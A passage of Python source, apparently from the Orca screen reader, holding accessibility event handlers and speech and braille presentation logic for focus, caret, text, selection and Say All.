line = messages.TABLE_MODE_ROW
else:
line = messages.TABLE_MODE_CELL
self.presentMessage(line)
return True
def doWhereAmI(self, inputEvent, basicOnly):
"""Peforms the whereAmI operation.
Arguments:
- inputEvent: The original inputEvent
"""
obj = orca_state.locusOfFocus
self.updateBraille(obj)
return self.whereAmI.whereAmI(obj, basicOnly)
def whereAmIBasic(self, inputEvent):
"""Speaks basic information about the current object of interest.
"""
self.doWhereAmI(inputEvent, True)
def whereAmIDetailed(self, inputEvent):
"""Speaks detailed/custom information about the current object of
interest.
"""
self.doWhereAmI(inputEvent, False)
def cycleDebugLevel(self, inputEvent=None):
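        """Cycle through the debug levels, from all down to off, and
        present the newly-set level."""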
levels = [debug.LEVEL_ALL, "all",
debug.LEVEL_FINEST, "finest",
debug.LEVEL_FINER, "finer",
debug.LEVEL_FINE, "fine",
debug.LEVEL_CONFIGURATION, "configuration",
debug.LEVEL_INFO, "info",
debug.LEVEL_WARNING, "warning",
debug.LEVEL_SEVERE, "severe",
debug.LEVEL_OFF, "off"]
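        # The list interleaves each level constant with its name, so
        # advancing by two moves from the current level to the next one.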
try:
levelIndex = levels.index(debug.debugLevel) + 2
        except ValueError:
levelIndex = 0
else:
if levelIndex >= len(levels):
levelIndex = 0
debug.debugLevel = levels[levelIndex]
briefMessage = levels[levelIndex + 1]
fullMessage = "Debug level %s." % briefMessage
self.presentMessage(fullMessage, briefMessage)
return True
########################################################################
# #
# AT-SPI OBJECT EVENT HANDLERS #
# #
########################################################################
def noOp(self, event):
"""Just here to capture events.
Arguments:
- event: the Event
"""
pass
def onActiveChanged(self, event):
"""Callback for object:state-changed:active accessibility events."""
if self.findCommandRun:
self.findCommandRun = False
self.find()
def onActiveDescendantChanged(self, event):
"""Callback for object:active-descendant-changed accessibility events."""
if not event.any_data:
return
if not event.source.getState().contains(pyatspi.STATE_FOCUSED) \
and not event.any_data.getState().contains(pyatspi.STATE_FOCUSED):
return
if self.stopSpeechOnActiveDescendantChanged(event):
speech.stop()
orca.setLocusOfFocus(event, event.any_data)
def onBusyChanged(self, event):
"""Callback for object:state-changed:busy accessibility events."""
pass
def onCheckedChanged(self, event):
"""Callback for object:state-changed:checked accessibility events."""
obj = event.source
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
state = obj.getState()
if state.contains(pyatspi.STATE_EXPANDABLE):
return
# Radio buttons normally change their state when you arrow to them,
# so we handle the announcement of their state changes in the focus
# handling code. However, we do need to handle radio buttons where
# the user needs to press the space key to select them.
if obj.getRole() == pyatspi.ROLE_RADIO_BUTTON:
eventString, mods = self.utilities.lastKeyAndModifiers()
            if eventString not in [" ", "space"]:
return
oldObj, oldState = self.pointOfReference.get('checkedChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['checkedChange'] = hash(obj), event.detail1
def onChildrenChanged(self, event):
"""Called when a child node has changed.
Arguments:
- event: the Event
"""
pass
def onCaretMoved(self, event):
"""Called whenever the caret moves.
Arguments:
- event: the Event
"""
if not orca_state.locusOfFocus:
return
obj, offset = self.pointOfReference.get("lastCursorPosition", (None, -1))
if offset == event.detail1 \
and self.utilities.isSameObject(obj, event.source):
return
# Should the event source be the locusOfFocus?
#
try:
role = orca_state.locusOfFocus.getRole()
except (LookupError, RuntimeError):
role = None
if role in [pyatspi.ROLE_FRAME, pyatspi.ROLE_DIALOG]:
frameApp = orca_state.locusOfFocus.getApplication()
eventApp = event.source.getApplication()
if frameApp == eventApp \
and event.source.getState().contains(pyatspi.STATE_FOCUSED):
orca.setLocusOfFocus(event, event.source, False)
# Ignore caret movements from non-focused objects, unless the
# currently focused object is the parent of the object which
# has the caret.
#
if (event.source != orca_state.locusOfFocus) \
and (event.source.parent != orca_state.locusOfFocus):
return
# We always automatically go back to focus tracking mode when
# the caret moves in the focused object.
#
if self.flatReviewContext:
self.toggleFlatReviewMode()
text = event.source.queryText()
self._saveLastCursorPosition(event.source, text.caretOffset)
if text.getNSelections():
return
self._presentTextAtNewCaretPosition(event)
def onDocumentReload(self, event):
"""Callback for document:reload accessibility events."""
pass
def onDocumentLoadComplete(self, event):
"""Callback for document:load-complete accessibility events."""
pass
def onDocumentLoadStopped(self, event):
"""Callback for document:load-stopped accessibility events."""
pass
def onExpandedChanged(self, event):
"""Callback for object:state-changed:expanded accessibility events."""
obj = event.source
role = obj.getRole()
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus) \
           and role not in [pyatspi.ROLE_TABLE_ROW, pyatspi.ROLE_COMBO_BOX]:
return
oldObj, oldState = self.pointOfReference.get('expandedChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['expandedChange'] = hash(obj), event.detail1
def onIndeterminateChanged(self, event):
"""Callback for object:state-changed:indeterminate accessibility events."""
# If this state is cleared, the new state will become checked or unchecked
# and we should get object:state-changed:checked events for those cases.
# Therefore, if the state is not now indeterminate/partially checked,
# ignore this event.
if not event.detail1:
return
obj = event.source
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
oldObj, oldState = self.pointOfReference.get('indeterminateChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['indeterminateChange'] = hash(obj), event.detail1
def onMouseButton(self, event):
"""Called whenever the user presses or releases a mouse button.
Arguments:
- event: the Event
"""
mouseEvent = input_event.MouseButtonEvent(event)
orca_state.lastInputEvent = mouseEvent
if mouseEvent.pressed:
speech.stop()
return
# If we've received a mouse button released event, then check if
        # there are any text selections for the locus of focus and speak
# them.
#
obj = orca_state.locusOfFocus
try:
text = obj.queryText()
except:
return
self.updateBraille(orca_state.locusOfFocus)
textContents = self.utilities.allSelectedText(obj)[0]
if not textContents:
return
utterances = []
utterances.append(textContents)
utterances.append(messages.TEXT_SELECTED)
speech.speak(utterances)
def onNameChanged(self, event):
"""Callback for object:property-change:accessible-name events."""
obj = event.source
names = self.pointOfReference.get('names', {})
oldName = names.get(hash(obj))
if oldName == event.any_data:
return
        # We are ignoring name changes in comboboxes that have focus;
        # see bgo#617204.
role = obj.getRole()
if role == pyatspi.ROLE_COMBO_BOX:
return
# Table cell accessibles in trees are often reused. When this occurs,
# we get name-changed events when the selection changes.
if role == pyatspi.ROLE_TABLE_CELL:
return
# Normally, we only care about name changes in the current object.
# But with the new GtkHeaderBar, we are seeing instances where the
# real frame remains the same, but the functional frame changes
# e.g. g-c-c going from all settings to a specific panel.
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
if role != pyatspi.ROLE_FRAME \
or not obj.getState().contains(pyatspi.STATE_ACTIVE):
return
names[hash(obj)] = event.any_data
self.pointOfReference['names'] = names
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
def onPressedChanged(self, event):
"""Callback for object:state-changed:pressed accessibility events."""
obj = event.source
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
oldObj, oldState = self.pointOfReference.get('pressedChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['pressedChange'] = hash(obj), event.detail1
def onSelectedChanged(self, event):
"""Callback for object:state-changed:selected accessibility events."""
obj = event.source
state = obj.getState()
if not state.contains(pyatspi.STATE_FOCUSED):
return
if not self.utilities.isSameObject(orca_state.locusOfFocus, obj):
return
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return
isSelected = state.contains(pyatspi.STATE_SELECTED)
announceState = False
keyString, mods = self.utilities.lastKeyAndModifiers()
if keyString == "space":
announceState = True
elif keyString in ["Down", "Up"] \
and isSelected and obj.getRole() == pyatspi.ROLE_TABLE_CELL:
announceState = True
if not announceState:
return
# TODO - JD: Unlike the other state-changed callbacks, it seems unwise
# to call generateSpeech() here because that also will present the
# expandable state if appropriate for the object type. The generators
# need to gain some smarts w.r.t. state changes.
voice = self.voices.get(settings.SYSTEM_VOICE)
if event.detail1:
speech.speak(messages.TEXT_SELECTED, voice, False)
else:
speech.speak(messages.TEXT_UNSELECTED, voice, False)
def onSelectionChanged(self, event):
"""Callback for object:selection-changed accessibility events."""
obj = event.source
state = obj.getState()
if state.contains(pyatspi.STATE_MANAGES_DESCENDANTS):
return
# TODO - JD: We need to give more thought to where we look to this
# event and where we prefer object:state-changed:selected.
# If the current item's selection is toggled, we'll present that
# via the state-changed event.
keyString, mods = self.utilities.lastKeyAndModifiers()
if keyString == "space":
return
# Save the event source, if it is a menu or combo box. It will be
# useful for optimizing componentAtDesktopCoords in the case that
# the pointer is hovering over a menu item. The alternative is to
# traverse the application's tree looking for potential moused-over
# menu items.
if obj.getRole() in (pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU):
self.lastSelectedMenu = obj
selectedChildren = self.utilities.selectedChildren(obj)
for child in selectedChildren:
if not self.utilities.isLayoutOnly(child):
orca.setLocusOfFocus(event, child)
break
def onSensitiveChanged(self, event):
"""Callback for object:state-changed:sensitive accessibility events."""
pass
def onFocus(self, event):
"""Callback for focus: accessibility events."""
pass
def onFocusedChanged(self, event):
"""Callback for object:state-changed:focused accessibility events."""
if not event.detail1:
return
obj = event.source
state = obj.getState()
if not state.contains(pyatspi.STATE_FOCUSED):
return
window = self.utilities.topLevelObject(obj)
if window:
try:
iconified = window.getState().contains(pyatspi.STATE_ICONIFIED)
except:
return
if iconified:
return
if obj and obj.childCount and obj.getRole() != pyatspi.ROLE_COMBO_BOX:
selectedChildren = self.utilities.selectedChildren(obj)
if selectedChildren:
obj = selectedChildren[0]
orca.setLocusOfFocus(event, obj)
def onShowingChanged(self, event):
"""Callback for object:state-changed:showing accessibility events."""
obj = event.source
role = obj.getRole()
if role == pyatspi.ROLE_NOTIFICATION:
speech.speak(self.speechGenerator.generateSpeech(obj))
visibleOnly = not self.utilities.isStatusBarNotification(obj)
labels = self.utilities.unrelatedLabels(obj, visibleOnly)
msg = ''.join(map(self.utilities.displayedText, labels))
self.displayBrailleMessage(msg, flashTime=settings.brailleFlashTime)
notification_messages.saveMessage(msg)
return
if role == pyatspi.ROLE_TOOL_TIP:
keyString, mods = self.utilities.lastKeyAndModifiers()
if keyString != "F1" \
and not _settingsManager.getSetting('presentToolTips'):
return
if event.detail1:
self.presentToolTip(obj)
return
if orca_state.locusOfFocus and keyString == "F1":
obj = orca_state.locusOfFocus
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj))
return
def onTextAttributesChanged(self, event):
"""Called when an object's text attributes change. Right now this
method is only to handle the presentation of spelling errors on
the fly. Also note that right now, the Gecko toolkit is the only
one to present this information to us.
Arguments:
- event: the Event
"""
verbosity = _settingsManager.getSetting('speechVerbosityLevel')
if verbosity == settings.VERBOSITY_LEVEL_VERBOSE \
and self.utilities.isSameObject(
event.source, orca_state.locusOfFocus):
try:
text = event.source.queryText()
except:
return
# If the misspelled word indicator has just appeared, it's
# because the user typed a word boundary or navigated out
# of the word. We don't want to have to store a full set of
# each object's text attributes to compare, therefore, we'll
# check the previous word (most likely case) and the next
# word with respect to the current position.
#
offset = text.caretOffset
if not text.getText(offset, offset+1).isalnum():
offset -= 1
if self.utilities.isWordMisspelled(event.source, offset-1) \
or self.utilities.isWordMisspelled(event.source, offset+1):
self.speakMessage(messages.MISSPELLED)
def onTextDeleted(self, event):
"""Called whenever text is deleted from an object.
Arguments:
- event: the Event
"""
# Ignore text deletions from non-focused objects, unless the
# currently focused object is the parent of the object from which
# text was deleted
#
if (event.source != orca_state.locusOfFocus) \
and (event.source.parent != orca_state.locusOfFocus):
return
# We'll also ignore sliders because we get their output via
# their values changing.
#
if event.source.getRole() == pyatspi.ROLE_SLIDER:
return
# [[[NOTE: WDW - if we handle events synchronously, we'll
# be looking at the text object *before* the text was
# actually removed from the object. If we handle events
# asynchronously, we'll be looking at the text object
# *after* the text was removed. The importance of knowing
# this is that the output will differ depending upon how
# orca.settings.asyncMode has been set. For example, the
# regression tests run in synchronous mode, so the output
# they see will not be the same as what the user normally
# experiences.]]]
self.updateBraille(event.source)
# The any_data member of the event object has the deleted text in
# it - If the last key pressed was a backspace or delete key,
# speak the deleted text. [[[TODO: WDW - again, need to think
# about the ramifications of this when it comes to editors such
        # as vi or emacs.]]]
#
keyString, mods = self.utilities.lastKeyAndModifiers()
if not keyString:
return
text = event.source.queryText()
if keyString == "BackSpace":
# Speak the character that has just been deleted.
#
character = event.any_data
elif keyString == "Delete" \
or (keyString == "D" and mods & keybindings.CTRL_MODIFIER_MASK):
# Speak the character to the right of the caret after
# the current right character has been deleted.
#
offset = text.caretOffset
[character, startOffset, endOffset] = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
else:
return
if len(character) == 1:
self.speakCharacter(character)
return
if self.utilities.linkIndex(event.source, text.caretOffset) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif character.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
# We won't interrupt what else might be being spoken
# right now because it is typically something else
# related to this event.
#
speech.speak(character, voice, False)
def onTextInserted(self, event):
"""Called whenever text is inserted into an object.
Arguments:
- event: the Event
"""
# Ignore text insertions from non-focused objects, unless the
# currently focused object is the parent of the object from which
# text was inserted.
#
if (event.source != orca_state.locusOfFocus) \
and (event.source.parent != orca_state.locusOfFocus):
return
ignoreRoles = [pyatspi.ROLE_LABEL,
pyatspi.ROLE_MENU,
pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_SLIDER,
pyatspi.ROLE_SPIN_BUTTON]
role = event.source.getRole()
if role in ignoreRoles:
return
state = event.source.getState()
if role == pyatspi.ROLE_TABLE_CELL \
and not state.contains(pyatspi.STATE_FOCUSED) \
and not state.contains(pyatspi.STATE_SELECTED):
return
self.updateBraille(event.source)
# If the last input event was a keyboard event, check to see if
# the text for this event matches what the user typed. If it does,
# then don't speak it.
#
# Note that the text widgets sometimes compress their events,
# thus we might get a longer string from a single text inserted
# event, while we also get individual keyboard events for the
# characters used to type the string. This is ugly. We attempt
# to handle it here by only echoing text if we think it was the
# result of a command (e.g., a paste operation).
#
# Note that we have to special case the space character as it
# comes across as "space" in the keyboard event and " " in the
# text event.
#
string = event.any_data
speakThis = False
wasCommand = False
wasAutoComplete = False
if isinstance(orca_state.lastInputEvent, input_event.MouseButtonEvent):
speakThis = orca_state.lastInputEvent.button == "2"
else:
keyString, mods = self.utilities.lastKeyAndModifiers()
wasCommand = mods & keybindings.COMMAND_MODIFIER_MASK
if not wasCommand and keyString in ["Return", "Tab", "space"] \
and role == pyatspi.ROLE_TERMINAL \
and event.any_data.strip():
wasCommand = True
try:
selections = event.source.queryText().getNSelections()
except:
selections = 0
if selections:
wasAutoComplete = role in [pyatspi.ROLE_TEXT, pyatspi.ROLE_ENTRY]
if (string == " " and keyString == "space") or string == keyString:
pass
elif wasCommand or wasAutoComplete:
speakThis = True
elif role == pyatspi.ROLE_PASSWORD_TEXT \
and _settingsManager.getSetting('enableKeyEcho') \
and _settingsManager.getSetting('enablePrintableKeys'):
# Echoing "star" is preferable to echoing the descriptive
# name of the bullet that has appeared (e.g. "black circle")
#
string = "*"
speakThis = True
# Auto-completed, auto-corrected, auto-inserted, etc.
#
speakThis = speakThis or self.utilities.isAutoTextEvent(event)
# We might need to echo this if it is a single character.
#
speakThis = speakThis \
or (_settingsManager.getSetting('enableEchoByCharacter') \
and string \
and role != pyatspi.ROLE_PASSWORD_TEXT \
and len(string.strip()) == 1)
if speakThis:
if string.isupper():
speech.speak(string, self.voices[settings.UPPERCASE_VOICE])
elif not string.isalnum():
self.speakCharacter(string)
else:
speech.speak(string)
if wasCommand:
return
if wasAutoComplete:
self.pointOfReference['lastAutoComplete'] = hash(event.source)
try:
text = event.source.queryText()
except NotImplementedError:
return
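        # If the character just entered completed a sentence or word,
        # echo that sentence or word per the user's echo settings.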
offset = text.caretOffset - 1
previousOffset = offset - 1
if (offset < 0 or previousOffset < 0):
return
[currentChar, startOffset, endOffset] = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
[previousChar, startOffset, endOffset] = \
text.getTextAtOffset(previousOffset, pyatspi.TEXT_BOUNDARY_CHAR)
if _settingsManager.getSetting('enableEchoBySentence') \
and self.utilities.isSentenceDelimiter(currentChar, previousChar):
self.echoPreviousSentence(event.source)
elif _settingsManager.getSetting('enableEchoByWord') \
and self.utilities.isWordDelimiter(currentChar):
self.echoPreviousWord(event.source)
def onTextSelectionChanged(self, event):
"""Callback for object:text-selection-changed accessibility events."""
obj = event.source
self.updateBraille(obj)
# Note: This guesswork to figure out what actually changed with respect
# to text selection will get eliminated once the new text-selection API
# is added to ATK and implemented by the toolkits. (BGO 638378)
textSelections = self.pointOfReference.get('textSelections', {})
oldStart, oldEnd = textSelections.get(hash(obj), (0, 0))
# TODO: JD - this doesn't yet handle the case of multiple non-contiguous
# selections in a single accessible object.
text = obj.queryText()
newStart, newEnd = text.getSelection(0)
textSelections[hash(obj)] = newStart, newEnd
self.pointOfReference['textSelections'] = textSelections
if self.pointOfReference.get('lastAutoComplete') == hash(obj):
return
nSelections = text.getNSelections()
handled = self._speakTextSelectionState(nSelections)
if handled:
return
changes = []
oldChars = set(range(oldStart, oldEnd))
newChars = set(range(newStart, newEnd))
if not oldChars.union(newChars):
return
if oldChars and newChars and not oldChars.intersection(newChars):
# A simultaneous unselection and selection centered at one offset.
changes.append([oldStart, oldEnd, messages.TEXT_UNSELECTED])
changes.append([newStart, newEnd, messages.TEXT_SELECTED])
else:
change = sorted(oldChars.symmetric_difference(newChars))
if not change:
return
changeStart, changeEnd = change[0], change[-1] + 1
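            # If the old selection is a strict subset of the new one, the
            # selection grew; otherwise it shrank.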
if oldChars < newChars:
changes.append([changeStart, changeEnd, messages.TEXT_SELECTED])
else:
changes.append([changeStart, changeEnd, messages.TEXT_UNSELECTED])
speakMessage = not _settingsManager.getSetting('onlySpeakDisplayedText')
for start, end, message in changes:
self.sayPhrase(obj, start, end)
if speakMessage:
self.speakMessage(message, interrupt=False)
def onColumnReordered(self, event):
"""Called whenever the columns in a table are reordered.
Arguments:
- event: the Event
"""
parentTable = self.utilities.ancestorWithRole(
orca_state.locusOfFocus, [pyatspi.ROLE_TABLE], [pyatspi.ROLE_FRAME])
if event.source != parentTable:
return
self.presentMessage(messages.TABLE_REORDERED_COLUMNS)
def onRowReordered(self, event):
"""Called whenever the rows in a table are reordered.
Arguments:
- event: the Event
"""
parentTable = self.utilities.ancestorWithRole(
orca_state.locusOfFocus, [pyatspi.ROLE_TABLE], [pyatspi.ROLE_FRAME])
if event.source != parentTable:
return
self.presentMessage(messages.TABLE_REORDERED_ROWS)
def onValueChanged(self, event):
"""Called whenever an object's value changes. Currently, the
value changes for non-focused objects are ignored.
Arguments:
- event: the Event
"""
obj = event.source
role = obj.getRole()
value = obj.queryValue()
if "oldValue" in self.pointOfReference \
and (value.currentValue == self.pointOfReference["oldValue"]):
return
if role == pyatspi.ROLE_PROGRESS_BAR:
self.handleProgressBarUpdate(event, obj)
return
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
self.pointOfReference["oldValue"] = value.currentValue
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
def onWindowActivated(self, event):
"""Called whenever a toplevel window is activated.
Arguments:
- event: the Event
"""
self.pointOfReference = {}
self.windowActivateTime = time.time()
orca.setLocusOfFocus(event, event.source)
# We keep track of the active window to handle situations where
# we get window activated and window deactivated events out of
# order (see onWindowDeactivated).
#
# For example, events can be:
#
# window:activate (w1)
# window:activate (w2)
# window:deactivate (w1)
#
# as well as:
#
# window:activate (w1)
# window:deactivate (w1)
# window:activate (w2)
#
orca_state.activeWindow = event.source
def onWindowCreated(self, event):
"""Callback for window:create accessibility events."""
pass
def onWindowDeactivated(self, event):
"""Called whenever a toplevel window is deactivated.
Arguments:
- event: the Event
"""
self.pointOfReference = {}
menuRoles = [pyatspi.ROLE_MENU,
pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_CHECK_MENU_ITEM,
pyatspi.ROLE_RADIO_MENU_ITEM]
# If we get into a popup menu, the parent application will likely
# emit a window-deactivate event. But functionally we're still in
# the same window. In this case, we do not want to update anything.
try:
role = orca_state.locusOfFocus.getRole()
except:
pass
else:
if role in menuRoles:
return
# If we receive a "window:deactivate" event for the object that
# currently has focus, then stop the current speech output.
# This is very useful for terminating long speech output from
# commands running in gnome-terminal.
#
if orca_state.locusOfFocus and \
(orca_state.locusOfFocus.getApplication() == \
event.source.getApplication()):
speech.stop()
# Clear the braille display just in case we are about to give
# focus to an inaccessible application. See bug #519901 for
# more details.
#
self.clearBraille()
# Hide the flat review window and reset it so that it will be
# recreated.
#
if self.flatReviewContext:
self.flatReviewContext = None
self.updateBraille(orca_state.locusOfFocus)
        # Because window activated and deactivated events may be
        # received in any order when switching from one application to
        # another, we only change the locusOfFocus and activeWindow
        # when we are dealing with an event from the current
        # activeWindow.
#
if event.source == orca_state.activeWindow:
orca.setLocusOfFocus(event, None)
orca_state.activeWindow = None
# disable list notification messages mode
notification_messages.listNotificationMessagesModeEnabled = False
# disable learn mode
orca_state.learnModeEnabled = False
########################################################################
# #
# Methods for presenting content #
# #
########################################################################
def _presentTextAtNewCaretPosition(self, event, otherObj=None):
"""Updates braille and outputs speech for the event.source or the
otherObj."""
obj = otherObj or event.source
text = obj.queryText()
self.updateBrailleForNewCaretPosition(obj)
if self._inSayAll:
return
if not orca_state.lastInputEvent:
return
if isinstance(orca_state.lastInputEvent, input_event.MouseButtonEvent):
if not orca_state.lastInputEvent.pressed:
self.sayLine(obj)
return
# Guess why the caret moved and say something appropriate.
# [[[TODO: WDW - this motion assumes traditional GUI
# navigation gestures. In an editor such as vi, line up and
# down is done via other actions such as "i" or "j". We may
# need to think about this a little harder.]]]
#
keyString, mods = self.utilities.lastKeyAndModifiers()
if not keyString:
return
isControlKey = mods & keybindings.CTRL_MODIFIER_MASK
if keyString in ["Up", "Down"]:
self.sayLine(obj)
elif keyString in ["Left", "Right"]:
if isControlKey:
self.sayWord(obj)
else:
self.sayCharacter(obj)
elif keyString == "Page_Up":
# TODO - JD: Why is Control special here?
# If the user has typed Control-Page_Up, then we
# speak the character to the right of the current text cursor
# position otherwise we speak the current line.
#
if isControlKey:
self.sayCharacter(obj)
else:
self.sayLine(obj)
elif keyString == "Page_Down":
self.sayLine(obj)
elif keyString in ["Home", "End"]:
if isControlKey:
self.sayLine(obj)
else:
self.sayCharacter(obj)
def _rewindSayAll(self, context, minCharCount=10):
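        """Rewinds Say All to the start of an earlier context containing
        more than minCharCount characters. Returns True if the rewind was
        performed; False if rewind-and-fast-forward is disabled."""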
if not _settingsManager.getSetting('rewindAndFastForwardInSayAll'):
return False
index = self._sayAllContexts.index(context)
self._sayAllContexts = self._sayAllContexts[0:index]
while self._sayAllContexts:
context = self._sayAllContexts.pop()
if context.endOffset - context.startOffset > minCharCount:
break
try:
text = context.obj.queryText()
except:
pass
else:
orca.setLocusOfFocus(None, context.obj, notifyScript=False)
text.setCaretOffset(context.startOffset)
self.sayAll(None, context.obj, context.startOffset)
return True
def _fastForwardSayAll(self, context):
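        """Fast-forwards Say All by resuming speech from the end of the
        context being spoken. Returns True if handled; False if
        rewind-and-fast-forward is disabled."""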
if not _settingsManager.getSetting('rewindAndFastForwardInSayAll'):
return False
try:
text = context.obj.queryText()
except:
pass
else:
orca.setLocusOfFocus(None, context.obj, notifyScript=False)
text.setCaretOffset(context.endOffset)
self.sayAll(None, context.obj, context.endOffset)
return True
def __sayAllProgressCallback(self, context, progressType):
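        """Speech-server callback which tracks Say All progress, handles
        rewind and fast-forward on interruption, and repositions the caret
        when speech is interrupted or completed."""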
# [[[TODO: WDW - this needs work. Need to be able to manage
# the monitoring of progress and couple that with both updating
# the visual progress of what is being spoken as well as
# positioning the cursor when speech has stopped.]]]
#
try:
text = context.obj.queryText()
char = text.getText(context.currentOffset, context.currentOffset+1)
except:
return
# Setting the caret at the offset of an embedded object results in
# focus changes.
if char == self.EMBEDDED_OBJECT_CHARACTER:
return
if progressType == speechserver.SayAllContext.PROGRESS:
return
elif progressType == speechserver.SayAllContext.INTERRUPTED:
if isinstance(orca_state.lastInputEvent, input_event.KeyboardEvent):
self._sayAllIsInterrupted = True
lastKey = orca_state.lastInputEvent.event_string
if lastKey == "Down" and self._fastForwardSayAll(context):
return
elif lastKey == "Up" and self._rewindSayAll(context):
return
self._inSayAll = False
self._sayAllContexts = []
text.setCaretOffset(context.currentOffset)
elif progressType == speechserver.SayAllContext.COMPLETED:
orca.setLocusOfFocus(None, context.obj, notifyScript=False)
text.setCaretOffset(context.currentOffset)
# If there is a selection, clear it. See bug #489504 for more details.
#
if text.getNSelections():
text.setSelection(0, context.currentOffset, context.currentOffset)
def inSayAll(self):
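        """Returns True if Say All is in progress or was just interrupted."""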
return self._inSayAll or self._sayAllIsInterrupted
def echoPreviousSentence(self, obj):
"""Speaks the sentence prior to the caret, as long as there is
a sentence prior to the caret and there is no intervening sentence
delimiter between the caret and the end of the sentence.
The entry condition for this method is that the character
prior to the current caret position is a sentence delimiter,
and it's what caused this method to be called in the first
place.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface.
"""
try:
text = obj.queryText()
except NotImplementedError:
return
offset = text.caretOffset - 1
previousOffset = text.caretOffset - 2
if (offset < 0 or previousOffset < 0):
return
[currentChar, startOffset, endOffset] = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
[previousChar, startOffset, endOffset] = \
text.getTextAtOffset(previousOffset, pyatspi.TEXT_BOUNDARY_CHAR)
if not self.utilities.isSentenceDelimiter(currentChar, previousChar):
return
# OK - we seem to be cool so far. So...starting with what
# should be the last character in the sentence (caretOffset - 2),
# work our way to the beginning of the sentence, stopping when
# we hit another sentence delimiter.
#
sentenceEndOffset = text.caretOffset - 2
sentenceStartOffset = sentenceEndOffset
while sentenceStartOffset >= 0:
[currentChar, startOffset, endOffset] = \
text.getTextAtOffset(sentenceStartOffset,
pyatspi.TEXT_BOUNDARY_CHAR)
[previousChar, startOffset, endOffset] = \
text.getTextAtOffset(sentenceStartOffset-1,
pyatspi.TEXT_BOUNDARY_CHAR)
if self.utilities.isSentenceDelimiter(currentChar, previousChar):
break
else:
sentenceStartOffset -= 1
# If we came across a sentence delimiter before hitting any
# text, we really don't have a previous sentence.
#
# Otherwise, get the sentence. Remember we stopped when we
# hit a sentence delimiter, so the sentence really starts at
# sentenceStartOffset + 1. getText also does not include
# the character at sentenceEndOffset, so we need to adjust
# for that, too.
#
if sentenceStartOffset == sentenceEndOffset:
return
else:
sentence = self.utilities.substring(obj, sentenceStartOffset + 1,
sentenceEndOffset + 1)
if self.utilities.linkIndex(obj, sentenceStartOffset + 1) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif sentence.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
sentence = self.utilities.adjustForRepeats(sentence)
speech.speak(sentence, voice)
def echoPreviousWord(self, obj, offset=None):
"""Speaks the word prior to the caret, as long as there is
a word prior to the caret and there is no intervening word
delimiter between the caret and the end of the word.
The entry condition for this method is that the character
prior to the current caret position is a word delimiter,
and it's what caused this method to be called in the first
place.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface.
- offset: if not None, the offset within the text to use as the
end of the word.
"""
try:
text = obj.queryText()
except NotImplementedError:
return
        if offset is None:
if text.caretOffset == -1:
offset = text.characterCount
else:
offset = text.caretOffset - 1
if (offset < 0):
return
[char, startOffset, endOffset] = \
text.getTextAtOffset( \
offset,
pyatspi.TEXT_BOUNDARY_CHAR)
if not self.utilities.isWordDelimiter(char):
return
# OK - we seem to be cool so far. So...starting with what
# should be the last character in the word (caretOffset - 2),
# work our way to the beginning of the word, stopping when
# we hit another word delimiter.
#
wordEndOffset = offset - 1
wordStartOffset = wordEndOffset
while wordStartOffset >= 0:
[char, startOffset, endOffset] = \
text.getTextAtOffset( \
wordStartOffset,
pyatspi.TEXT_BOUNDARY_CHAR)
if self.utilities.isWordDelimiter(char):
break
else:
wordStartOffset -= 1
# If we came across a word delimiter before hitting any
# text, we really don't have a previous word.
#
# Otherwise, get the word. Remember we stopped when we
# hit a word delimiter, so the word really starts at
# wordStartOffset + 1. getText also does not include
# the character at wordEndOffset, so we need to adjust
# for that, too.
#
if wordStartOffset == wordEndOffset:
return
else:
word = self.utilities.\
substring(obj, wordStartOffset + 1, wordEndOffset + 1)
if self.utilities.linkIndex(obj, wordStartOffset + 1) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif word.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
word = self.utilities.adjustForRepeats(word)
speech.speak(word, voice)
def handleProgressBarUpdate(self, event, obj):
"""Determine whether this progress bar event should be spoken or not.
It should be spoken if:
1/ settings.enableProgressBarUpdates is True.
2/ settings.progressBarVerbosity matches the current location of the
progress bar.
3/ The time of this event exceeds the
settings.progressBarUpdateInterval value. This value
indicates the time (in seconds) between potential spoken
progress bar updates.
4/ The new value of the progress bar (converted to an integer),
        is different from the last one or equals 100 (i.e., complete).
Arguments:
- event: if not None, the Event that caused this to happen
- obj: the Accessible progress bar object.
"""
if _settingsManager.getSetting('enableProgressBarUpdates'):
makeAnnouncement = False
